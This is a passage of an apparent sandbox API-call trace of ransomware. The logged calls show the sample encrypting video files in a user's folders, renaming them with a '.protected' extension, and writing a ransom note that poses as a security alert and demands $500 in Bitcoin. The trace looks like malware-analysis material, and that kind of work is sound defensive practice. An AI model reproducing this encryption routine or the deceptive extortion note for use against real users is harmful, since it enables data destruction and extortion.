dj76.flv", lpString2="$Recycle.bin") returned 1 [0092.926] lstrcmpiW (lpString1="2y4Ib8Ugb2MewHc dj76.flv", lpString2="System Volume Information") returned -1 [0092.926] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\2y4Ib8Ugb2MewHc dj76.flv") returned 74 [0092.926] StrStrIW (lpFirst="2y4Ib8Ugb2MewHc dj76.flv", lpSrch=".protected") returned 0x0 [0092.926] lstrcmpW (lpString1="2y4Ib8Ugb2MewHc dj76.flv", lpString2="RESTORE_FILES.txt") returned -1 [0092.926] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.926] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Videos\\m9MLQVuZ\\2y4Ib8Ugb2MewHc dj76.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\2y4ib8ugb2mewhc dj76.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\2y4Ib8Ugb2MewHc dj76.flv") returned 74 [0092.927] StrStrW (lpFirst="2y4Ib8Ugb2MewHc dj76.flv", lpSrch=".txt") returned 0x0 [0092.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\2y4Ib8Ugb2MewHc dj76.flv") returned 74 [0092.927] StrStrW (lpFirst="2y4Ib8Ugb2MewHc dj76.flv", lpSrch=".rar") returned 0x0 [0092.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\2y4Ib8Ugb2MewHc dj76.flv") returned 74 [0092.927] StrStrW (lpFirst="2y4Ib8Ugb2MewHc dj76.flv", lpSrch=".zip") returned 0x0 [0092.927] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.928] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.928] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.928] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.928] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.928] WriteFile (in: hFile=0xd4, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.929] CloseHandle (hObject=0xd4) returned 1 [0092.929] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\2y4Ib8Ugb2MewHc dj76.flv.protected") returned 84 [0092.929] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\2y4Ib8Ugb2MewHc dj76.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\2y4ib8ugb2mewhc dj76.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\2y4Ib8Ugb2MewHc dj76.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\2y4ib8ugb2mewhc dj76.flv.protected")) returned 1 [0092.930] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.930] lstrcmpiW (lpString1="FTPDR1TyjhRSsR6.mp4", lpString2="Windows") returned -1 [0092.930] lstrcmpiW (lpString1="FTPDR1TyjhRSsR6.mp4", lpString2="Program Files") returned -1 [0092.930] lstrcmpiW (lpString1="FTPDR1TyjhRSsR6.mp4", lpString2="Program Files (x86)") returned -1 [0092.930] lstrcmpiW (lpString1="FTPDR1TyjhRSsR6.mp4", lpString2="$Recycle.bin") returned 1 [0092.930] lstrcmpiW (lpString1="FTPDR1TyjhRSsR6.mp4", lpString2="System Volume Information") returned -1 [0092.930] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\FTPDR1TyjhRSsR6.mp4") returned 69 [0092.930] StrStrIW (lpFirst="FTPDR1TyjhRSsR6.mp4", lpSrch=".protected") returned 0x0 [0092.930] lstrcmpW (lpString1="FTPDR1TyjhRSsR6.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0092.930] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.930] CryptEncrypt (in: 
hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\FTPDR1TyjhRSsR6.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\ftpdr1tyjhrssr6.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.931] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\FTPDR1TyjhRSsR6.mp4") returned 69 [0092.931] StrStrW (lpFirst="FTPDR1TyjhRSsR6.mp4", lpSrch=".txt") returned 0x0 [0092.931] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\FTPDR1TyjhRSsR6.mp4") returned 69 [0092.931] StrStrW (lpFirst="FTPDR1TyjhRSsR6.mp4", lpSrch=".rar") returned 0x0 [0092.931] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\FTPDR1TyjhRSsR6.mp4") returned 69 [0092.931] StrStrW (lpFirst="FTPDR1TyjhRSsR6.mp4", lpSrch=".zip") returned 0x0 [0092.931] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.932] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.932] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.933] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.933] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.933] CloseHandle (hObject=0xd4) returned 1 [0092.933] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\FTPDR1TyjhRSsR6.mp4.protected") returned 79 [0092.933] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\FTPDR1TyjhRSsR6.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\ftpdr1tyjhrssr6.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\FTPDR1TyjhRSsR6.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\ftpdr1tyjhrssr6.mp4.protected")) returned 1 [0092.934] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.934] lstrcmpiW (lpString1="X phn.mp4", lpString2="Windows") returned 1 [0092.934] lstrcmpiW (lpString1="X phn.mp4", lpString2="Program Files") returned 1 [0092.934] lstrcmpiW (lpString1="X phn.mp4", lpString2="Program Files (x86)") returned 1 [0092.934] lstrcmpiW (lpString1="X phn.mp4", lpString2="$Recycle.bin") returned 1 [0092.934] lstrcmpiW (lpString1="X phn.mp4", lpString2="System Volume Information") returned 1 [0092.934] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\X phn.mp4") returned 59 [0092.934] StrStrIW (lpFirst="X phn.mp4", lpSrch=".protected") returned 0x0 [0092.934] lstrcmpW (lpString1="X phn.mp4", lpString2="RESTORE_FILES.txt") returned 1 [0092.934] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.934] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\X phn.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\x phn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\X phn.mp4") returned 59 [0092.935] StrStrW (lpFirst="X phn.mp4", lpSrch=".txt") returned 0x0 [0092.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\X phn.mp4") returned 59 [0092.935] StrStrW (lpFirst="X phn.mp4", lpSrch=".rar") returned 0x0 [0092.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\X phn.mp4") returned 59 [0092.935] StrStrW (lpFirst="X phn.mp4", lpSrch=".zip") returned 0x0 [0092.935] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.936] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.937] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.937] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.937] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.937] CloseHandle (hObject=0xd4) returned 1 [0092.937] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\X phn.mp4.protected") returned 69 [0092.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\X phn.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\x phn.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\X phn.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\x phn.mp4.protected")) returned 1 [0092.938] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.938] lstrcmpiW (lpString1="xA 5w3mu0QO.mp4", lpString2="Windows") returned 1 [0092.938] lstrcmpiW (lpString1="xA 5w3mu0QO.mp4", lpString2="Program Files") returned 1 [0092.938] lstrcmpiW (lpString1="xA 5w3mu0QO.mp4", lpString2="Program Files (x86)") returned 1 [0092.938] lstrcmpiW (lpString1="xA 5w3mu0QO.mp4", lpString2="$Recycle.bin") returned 1 [0092.938] lstrcmpiW (lpString1="xA 5w3mu0QO.mp4", lpString2="System Volume Information") returned 1 [0092.938] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\xA 5w3mu0QO.mp4") returned 65 [0092.938] StrStrIW (lpFirst="xA 5w3mu0QO.mp4", lpSrch=".protected") returned 0x0 [0092.938] lstrcmpW (lpString1="xA 5w3mu0QO.mp4", lpString2="RESTORE_FILES.txt") returned 1 [0092.938] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.938] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\xA 5w3mu0QO.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\xa 5w3mu0qo.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.939] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\xA 5w3mu0QO.mp4") returned 65 [0092.939] StrStrW (lpFirst="xA 5w3mu0QO.mp4", lpSrch=".txt") returned 0x0 [0092.939] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\xA 5w3mu0QO.mp4") returned 65 [0092.939] StrStrW (lpFirst="xA 5w3mu0QO.mp4", lpSrch=".rar") returned 0x0 [0092.939] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\xA 5w3mu0QO.mp4") returned 65 [0092.939] StrStrW (lpFirst="xA 5w3mu0QO.mp4", lpSrch=".zip") returned 0x0 [0092.939] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.940] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.940] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.941] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.941] 
WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.941] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.941] CloseHandle (hObject=0xd4) returned 1 [0092.941] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\xA 5w3mu0QO.mp4.protected") returned 75 [0092.942] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\xA 5w3mu0QO.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\xa 5w3mu0qo.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\xA 5w3mu0QO.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\xa 5w3mu0qo.mp4.protected")) returned 1 [0092.942] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0092.942] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0092.942] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\RESTORE_FILES.txt") returned 67 [0092.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\m9MLQVuZ\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m9mlqvuz\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.943] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.943] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0092.944] lstrlenA (lpString="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") returned 684 [0092.944] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0092.944] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.944] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0092.944] CloseHandle (hObject=0xb4) returned 1 [0092.945] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.945] lstrcmpiW (lpString1="ngZxA0y_ZD", lpString2="Windows") returned -1 [0092.945] lstrcmpiW (lpString1="ngZxA0y_ZD", lpString2="Program Files") returned -1 [0092.945] lstrcmpiW (lpString1="ngZxA0y_ZD", lpString2="Program Files (x86)") returned -1 [0092.945] lstrcmpiW (lpString1="ngZxA0y_ZD", lpString2="$Recycle.bin") returned 1 [0092.945] lstrcmpiW (lpString1="ngZxA0y_ZD", lpString2="System Volume Information") returned -1 [0092.945] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD") returned 51 [0092.945] lstrcmpW (lpString1="ngZxA0y_ZD", lpString2=".") returned 1 [0092.945] lstrcmpW (lpString1="ngZxA0y_ZD", lpString2="..") returned 1 [0092.945] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\*") returned 53 [0092.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0092.945] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.945] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.945] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.945] lstrcmpiW (lpString1=".", 
lpString2="$Recycle.bin") returned 1 [0092.945] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.945] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\.") returned 53 [0092.945] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.945] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.945] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.945] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.945] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.945] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.945] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.946] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\..") returned 54 [0092.946] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.946] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.946] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.946] lstrcmpiW (lpString1="f-xM.mp4", lpString2="Windows") returned -1 [0092.946] lstrcmpiW (lpString1="f-xM.mp4", lpString2="Program Files") returned -1 [0092.946] lstrcmpiW (lpString1="f-xM.mp4", lpString2="Program Files (x86)") returned -1 [0092.946] lstrcmpiW (lpString1="f-xM.mp4", lpString2="$Recycle.bin") returned 1 [0092.946] lstrcmpiW (lpString1="f-xM.mp4", lpString2="System Volume Information") returned -1 [0092.946] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\f-xM.mp4") returned 60 [0092.946] StrStrIW (lpFirst="f-xM.mp4", lpSrch=".protected") returned 0x0 [0092.946] lstrcmpW 
(lpString1="f-xM.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0092.946] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.946] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\f-xM.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\f-xm.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.947] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\f-xM.mp4") returned 60 [0092.947] StrStrW (lpFirst="f-xM.mp4", lpSrch=".txt") returned 0x0 [0092.947] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\f-xM.mp4") returned 60 [0092.947] StrStrW (lpFirst="f-xM.mp4", lpSrch=".rar") returned 0x0 [0092.947] lstrlenW 